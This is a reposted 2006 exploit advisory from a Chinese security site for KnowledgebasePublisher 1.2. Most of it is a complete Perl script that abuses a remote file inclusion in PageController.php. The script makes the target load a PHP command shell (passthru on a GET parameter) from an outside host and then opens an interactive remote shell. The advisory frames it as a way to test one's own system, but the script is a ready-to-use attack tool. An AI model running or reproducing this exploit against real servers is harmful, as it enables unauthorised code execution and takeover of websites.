首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KnowledgebasePublisher 1.2 Remote Code Execution Exploit
来源:ExploiterCode.com 作者:uid0 发布时间:2006-03-16  

KnowledgebasePublisher Command Execution (Exploit)

Summary
KnowledgebasePublisher is "a free and Opensource knowledgebase / FAQ solution for your websites, or just content manager about any other type of article that you want to publish on your website. It's so easy to use that you can be managing knowledgebase on your website right from your own web browser".

A command execution vulnerability has been discovered in KnowledgebasePublisher that allows remote attackers to cause the program to execute arbitrary code, the following exploit code can be used to test your system for the mentioned vulnerability.

Credit:
The information has been provided by uid0.

Details
Exploit:
#!/usr/bin/perl
##
# KnowledgebasePublisher 1.2 Remote Code Execution Exploit
# Bug Found By uid0
##
# (c) 2006
# ExploiterCode.com
##
# usage:
# perl knowledgebase.pl <location of KnowledgebasePublisher> <cmd shell location <cmd shell variable>
#
# perl knowledgebase.pl http://site.com/knowledgebase/ http://site.com/cmd.txt cmd
#
# cmd shell example: <?passthru($_GET[cmd]);?>
#
# cmd shell variable: ($_GET[cmd]);
##
# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, and everyone else!
#
# special shout to [ill]will! come back soon from jail!
##
# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com
##

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
print "[shell] \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'client/faq_1/PageController.php?dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ /;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.+)<br.\/>.<b>Fatal.error/)


{
$finreturn = $1;
$finreturn=~ tr/[ /[\n]/;
print "\r\n$finreturn\n\r";
last;
}

else {print "[shell] \$";}}}last;

sub head()
{
print "\n======================================\r\n";
print " *KnowledgebasePublisher 1.2 Remote Code Execution Exploit by ExploiterCode.com*\r\n";
print "======================================\r\n";
}
sub usage()
{
head();
print " Usage: knowledgebase.pl <Site> <cmd shell> <cmd variable>\r\n\n";
print " <Site> - Full path to KnowledgebasePublisher ex: http://www.site.com/knowledge/ \r\n";
print " <cmd shell> - Path to Cmd Shell e.g http://www.site.com/cmd.txt \r\n";
print " <cmd variable> - Command variable used in php shell \r\n";
print "======================================\r\n";
print " Bug Found by uid0\r\n";
print " www.exploitercode.com irc.exploitercode.com #exploitercode\r\n";
print "======================================\r\n";
exit();
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows Telephony Se
·MyBB version 1.04 and prior SQ
·Apple OSX Mail.app RFC1740 Rea
·Mercur IMAPD Buffer Overflow (
·PeerCast nextCGIarg Function R
·A vulnerability in HT 9.1 Expl
·PeerCast nextCGIarg Function R
·X.Org X11 (X11R6.9.0/X11R7.0)
·Dvbbs 7.1 boke.asp SQL Injecti
·BomberClone Buffer Overflow Ex
·Denial of Service exploit for
·Apple Mac OS X File Rewrites a
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved